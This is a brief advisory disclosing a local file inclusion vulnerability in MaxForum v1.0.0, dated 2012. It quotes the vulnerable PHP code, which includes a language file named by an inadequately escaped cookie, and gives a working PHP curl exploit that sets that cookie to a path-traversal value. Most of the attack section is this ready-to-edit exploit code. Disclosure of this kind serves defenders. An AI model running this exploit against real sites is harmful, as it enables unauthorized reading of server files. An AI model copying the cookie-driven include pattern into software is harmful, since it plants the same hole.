MaxForum Local File Inclusion Exploit

Summary

MaxForum v1.0.0 suffers from Local File Inclusion Vulnerability

Credit:

The information has been provided by ahwak2000.


Details

Vulnerable Systems:
 * MaxForum v1.0.0

in file /MaxForum/includes/forums/warn_popup.php

line 100 if (isset($_COOKIE[‘max_lang’]) && (!isset($_COOKIE[‘max_name’]))){
line 101 $board_lang = escape_string($_COOKIE[‘max_lang’]);
line 102 }
line 103
line 104 @include ‘../../language/$board_lang’;
line 105 @include ‘../../language/$board_lang.php’;

————-
in file /MaxForum/libs/php/functions.php

function escape_string($string) {

$string = addslashes($string);

$string = htmlspecialchars($string);
return $string;
}

Exploit:

<?
$url=’http://site.com/MaxForum/’;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url.’/includes/forums/warn_popup.php’);
curl_setopt($ch, CURLOPT_COOKIE, ‘max_lang=../gpl.txt’); // <— edit
$buffer = curl_exec($ch);
?>

#end

Disclosure Timeline:
Published: 2012-08-15

Categories: Exploits